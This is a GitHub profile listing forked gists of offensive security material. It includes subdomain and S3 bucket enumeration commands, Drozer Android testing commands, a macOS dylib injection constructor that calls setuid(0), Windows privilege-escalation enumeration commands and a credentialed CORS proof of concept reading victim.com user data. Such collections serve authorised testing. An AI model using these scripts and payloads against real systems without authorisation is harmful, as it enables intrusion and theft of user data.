MichaellCader michaellcader

🏠
Working from home
View GitHub Profile
@michaellcader
michaellcader / nuclei-scan.sh
Last active July 9, 2020 06:26 — forked from dwisiswant0/nuclei-scan.sh
Automate nuclei for given hosts
#!/bin/bash
set -euo pipefail
DOMAIN="$1"
OUT=~/nuclei-results/"${DOMAIN}"
TPL=~/nuclei-templates
mkdir -p "${OUT}"
# Enumerate subdomains, keep those answering HTTP(S), save the host list
subfinder -d "${DOMAIN}" -silent | httprobe | tee "${OUT}/${DOMAIN}.txt"
# Update the templates checkout
(cd "${TPL}" && git pull origin master)
# Run every template against the live hosts, one result file per template
find "${TPL}" -name "*.yaml" -print0 | while IFS= read -r -d '' tpl; do
  "${GOPATH}/bin/nuclei" -l "${OUT}/${DOMAIN}.txt" -t "${tpl}" -o "${OUT}/$(basename "${tpl}" .yaml).txt"
done
# Remove empty result files
find "${OUT}" -name "*.txt" -size 0 -delete
michaellcader / tmux-cheatsheet.markdown
Created July 18, 2020 14:15 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
#!/bin/bash
echo "###############################"
echo "# Ffuf #"
echo "###############################"
echo ""
echo ""
echo "[1] subdomains.txt"
echo "[2] subdomain-large.txt"
echo "[3] raft-large-directories.txt"
michaellcader / ffuf to enumerate s3
Last active June 2, 2022 03:19 — forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
[ffuf usage] Use wfuzz or ffuf to enumerate s3 #bugbounty
#!/bin/bash
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files:
michaellcader / Drozer_command.md
Last active June 2, 2022 03:26 — forked from castexyz/drozer.md
[mobile]Drozer commands #bugbounty

Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    * Starting a session
      * `adb forward tcp:31415 tcp:31415`
      * `drozer console connect`
      * `drozer console connect --server <ip>`
    * List modules
      * `ls`
michaellcader / inject.c
Created July 14, 2022 13:34 — forked from theevilbit/inject.c
DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX deep dive
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid() */

/* Runs automatically when the dylib is loaded through DYLD_INSERT_LIBRARIES,
   before the host binary's main() is entered. */
__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
    setuid(0);
    system("id");
    printf("Hello from dylib!\n");
}
michaellcader / windows_privesc
Created August 5, 2022 06:28 — forked from sckalath/windows_privesc
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
# GET Method
<script type="text/javascript">
// Credentialed cross-origin GET: the response is readable only if victim.com's
// CORS policy reflects the calling origin and sets Access-Control-Allow-Credentials: true
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("GET", "https://victim.com/getUserInfo", true);
req.withCredentials = true;
req.send();
function reqListener() { alert(req.responseText); }
</script>
michaellcader / unwxapkg.py
Created September 8, 2022 06:41 — forked from Integ/unwxapkg.py
A useful tool for unpacking wxapkg files, with Python 3 support.
# coding: utf-8
# py2 origin author lrdcq
# usage python3 unwxapkg.py filename
__author__ = 'Integ: https://github.com./integ'
import sys, os
import struct
class WxapkgFile(object):